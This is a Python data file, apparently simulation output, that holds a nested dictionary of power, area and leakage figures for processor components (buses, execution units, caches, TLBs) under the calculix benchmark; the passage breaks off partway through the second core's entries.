benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_rr/cmp_calculix/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_rr/cmp_calculix/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.453547,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.558924,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 2.4478,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.735586,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 1.27377,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.730543,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 2.7399,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.351814,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 9.97467,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.462441,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0266656,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.362687,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.197208,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.825128,
'Execution Unit/Register Files/Runtime Dynamic': 0.223874,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 1.00065,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.94454,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 5.87261,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.0014753,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.0014753,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00127541,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000488495,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00283291,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00705891,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0144871,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.189581,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.47087,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.643904,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 1.3259,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.124627,
'L2/Runtime Dynamic': 0.00677539,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.55449,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.59717,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.107325,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.107325,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 5.06337,
'Load Store Unit/Runtime Dynamic': 2.23379,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.264645,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.52929,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0939234,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0957804,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0772353,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.720869,
'Memory Management Unit/Runtime Dynamic': 0.173016,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 29.414,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 1.61335,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0570278,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.344076,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 2.01446,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 11.6265,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.235949,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.388014,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.27351,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.332422,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.536185,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.270648,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.13925,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.184947,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.4292,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.240594,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0139433,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.189191,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.103119,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.429785,
'Execution Unit/Register Files/Runtime Dynamic': 0.117062,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.457573,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.898371,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.94808,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00079136,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00079136,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000687776,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000265431,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00148131,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00375181,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00764096,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.099131,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.30558,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.246846,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.336694,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.83012,
'Instruction Fetch Unit/Runtime Dynamic': 0.694063,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0654942,
'L2/Runtime Dynamic': 0.00346993,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.98254,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.840294,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0564683,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0564683,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.24919,
'Load Store Unit/Runtime Dynamic': 1.17524,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.139241,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.278482,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0494172,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.050393,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.392058,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0404897,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.633057,
'Memory Management Unit/Runtime Dynamic': 0.0908827,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 22.7965,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.632894,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
